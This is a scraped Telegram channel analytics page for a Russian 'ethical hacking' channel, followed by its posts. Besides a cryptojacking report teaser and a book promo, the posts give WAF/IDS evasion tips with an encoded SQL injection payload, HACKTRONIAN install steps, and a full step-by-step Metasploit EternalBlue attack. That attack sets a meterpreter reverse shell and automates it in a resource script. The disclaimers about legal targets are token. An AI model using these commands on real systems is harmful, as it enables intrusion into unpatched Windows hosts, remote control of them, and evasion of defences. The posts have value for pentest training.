CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: PySec Edition
Channel CodeGuard: PySec Edition is an active participant. Currently, the community unites 14 198 subscribers, ranking 8 713 in the Technologies & Applications category and 45 538 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 198 subscribers.
According to the latest data from 30 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 898 over the last 30 days and by 19 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 9.79%. Within the first 24 hours after publication, content typically collects 5.46% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 390 views. Within the first day, a publication typically gains 775 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 5.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 01 October, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
Группа Kinsing, известная также как H2Miner и Resourceful Wolf, действует с 2019 года. Специализируется на криптоджекинге, в первую очередь – на майнинге криптовалюты Monero, а также на создании и расширении ботнетов. Во втором квартале 2025 года департамент киберразведки (Threat Intelligence) компании F6 зафиксировал волну атак группировки Kinsing на российские компании из сфер финансов, логистики и телекома. Целью этих атак было заражение устройств вредоносным ПО Kinsing и Xmrig для майнинга криптовалют.В этом отчёте мы подробно расскажем о ходе исследования – от исходных данных и применённых методов анализа до итоговой атрибуции атаки и предоставленных рекомендаций, – которое не только позволило установить злоумышленников, но и раскрыть попытки их атак на другие компании из России. 💀 Читать полностью на Хабре 😈 CodeGuard | #cybersecurity
wafw00f https://target.com
*Быстрый сканер, который скажет, защищён ли сайт и каким WAF.*
2. Медленные и тихие сканы на `ffuf`
Стандартные сканеры палят тебя моментально. Забивай на скорость, ставь паузы и делай всё тихо:
ffuf -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -p 0.5 -t 10 -o ffuf_results.json
- -p 0.5 — полсекунды между запросами, чтобы не злить WAF/IDS
- -t 10 — не больше 10 потоков, меньше шума
3. Меняем заголовки, чтобы быть незаметным
WAF фильтрует по User-Agent и другим заголовкам — меняй их:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://target.com/path
curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/path
Используй прокси и VPN, чтобы сменить IP и не светиться.
4. Кодируем ходы, чтобы сбить алгоритм
Пример с URL-кодированием полезной нагрузки:
curl "https://target.com/search?q=%27%20OR%201=1--"
Так SQL-инъекция выглядит неочевидно для WAF.
5. Медленные циклы с рандомной задержкой
Для обхода IDS:
for url in $(cat urls.txt); do
curl -A "Mozilla/5.0" "$url"
sleep $((RANDOM % 5 + 1)) # пауза случайно от 1 до 5 секунд
done
Медленный и нерегулярный трафик сложнее детектировать.
⚠️ Важно: Все инструменты запускай только на легальных целях и с разрешения владельца.
😈 CodeGuard | #pentest #WAF #OSINT #hackingtoolsgit clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
sudo ./install.sh
hacktronian
Для Android (Termux):
pkg install git python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py
📱 Есть подробный видеоруководство на YouTube для быстрого старта.
💡 Советы:
- Используй HACKTRONIAN как единый центр для запуска известных инструментов, экономя время.
- Комбинируй методы сбора информации и эксплуатации для максимальной эффективности.
- Постоянно обновляй и расширяй свои навыки с помощью этого набора.
😈 CodeGuard | #HACKTRONIAN #hackingtoolsВ этой статье Сергей — наш эксперт, который прошел путь от сисадмина до администратора средств защиты и, наконец, пентестера расскажет, где автоматизация незаменима, а где без человеческого мозга не обойтись. Пройдем по всем этапам пентеста от разведки до написания отчета, и посмотрим, как грамотно сочетать силу машин с интуицией специалиста.👩💻 Можете глянуть оригинал 😈 CodeGuard | #cybersecurity
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
# Загружаем официальный скрипт установки Metasploit с GitHub и сохраняем его в файл msfinstall
chmod +x msfinstall
# Делаем скрипт исполняемым (разрешаем запуск)
sudo ./msfinstall
# Запускаем скрипт с правами суперпользователя для установки Metasploit на систему
2. Запуск консоли Metasploit
msfconsole
# Запускаем Metasploit в интерактивном режиме — консоль откроется и готова к командам
3. Поиск подходящего эксплойта
search smb
# Ищем все эксплойты и модули, в названии или описании которых есть "smb" — часто используется в атаках на протокол SMB (например, EternalBlue)
4. Выбор эксплойта для работы
use exploit/windows/smb/ms17_010_eternalblue
# Загружаем модуль EternalBlue — один из самых известных эксплойтов для уязвимости в SMB
5. Просмотр и настройка параметров
show options
# Показываем список необходимых параметров для эксплойта — куда нужно указать цели, параметры для подключения и прочее
6. Установка IP и порта цели
set RHOST 192.168.1.100
# RHOST — IP адрес устройства жертвы, куда нацелена атака
set RPORT 445
# RPORT — порт для подключения (445 — стандартный порт SMB)
7. Настройка полезной нагрузки (payload) и параметров обратного подключения
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Payload — что именно будет выполнено после успешного взлома. Meterpreter — мощная оболочка для управления системой.
set LHOST 192.168.1.50
# LHOST — твой локальный IP-адрес, чтобы жертва могла "позвонить" тебе обратно (обратное TCP-соединение)
set LPORT 4444
# LPORT — порт, на который будет установлен обратный канал связи
8. Запуск эксплойта
exploit
# Запускаем атаку, Metasploit пытается использовать эксплойт и payload для получения доступа
9. Работа с открытыми сессиями
sessions
# Показывает список открытых сессий — активных подключений к "взломанным" машинам
10. Подключение к сессии
sessions -i 1
# Подключаемся к сессии с номером 1 для интерактивного управления удалённой системой
11. Выполнение команд в shell
shell
# Запускаем системный shell удалённого устройства – теперь можно выполнять команды, как будто ты физически работаешь на той машине
ls -la
# Команда списка файлов и папок с подробной информацией — пример простой команды для проверки доступа
12. Автоматизация через resource-файл
Создаём файл auto.rc с содержимым:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit
Запуск:
msfconsole -r auto.rc
# Запускаем msfconsole и сразу подгружаем команды из файла auto.rc — автоматизируем весь процесс и не вводим всё вручную
Важные советы для новичков
- Всегда запускай Metasploit на легальных целях и с разрешения владельцев.
- Перед тестом изучай публичные уязвимости и документацию выбранного модуля.
- Используй help и info для подробной информации о командах и эксплойтах.
- Meterpreter-сессии дают огромные возможности — от запуска команд до снятия скриншотов.
- Постепенно изучай post-exploitation модули для расширения контроля над системой.
🤔 Этот мини-гайд — базовый старт для погружения в Metasploit.
ставь реакцию 👍 и поделись постом с другом
😈 CodeGuard | #Metasploit #hackingtools💀 Linux глазами хакера Автор: Михаил Фленов Год издания: 2021Книга, если ты хочешь не просто использовать Linux, а понимать, как он работает изнутри — эта книга станет твоим главным руководством. Не про "как поставить систему". Про как сделать её безопасной, производительной и защищённой. 🧠Что внутри? - Базовое администрирование и управление доступом - Настройка Firewall и защита от атак - Настройка серверов: WEB, FTP, Proxy, DNS - Программы для электронной почты и файлообмена - Политика мониторинга и архивирования данных - Потенциальные уязвимости и как их избежать - Что делать при атаке или взломе — восстановление и предотвращение потери данных - Тестирование безопасности конфигурации (обновлённая информация для Ubuntu) 📌 В шестом издании — актуальная информация и новые инструменты для проверки безопасности. 🔝 Подходит: - Администраторам Linux - Специалистам по безопасности - Тем, кто хочет **понимать, как работает система, а не просто запускать команды** - Всем, кто хочет **строить безопасную и надёжную инфраструктуру** Безопасность начинается с понимания: - Как работают процессы в Linux - Как устроены права доступа - Какие службы могут быть уязвимы - Как защитить систему от реальных атак 📌 Эта книга — не про взлом ради взлома. Она про мышление защитника, который знает, как устроена система, чтобы не дать ей быть сломанной. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #linux #security
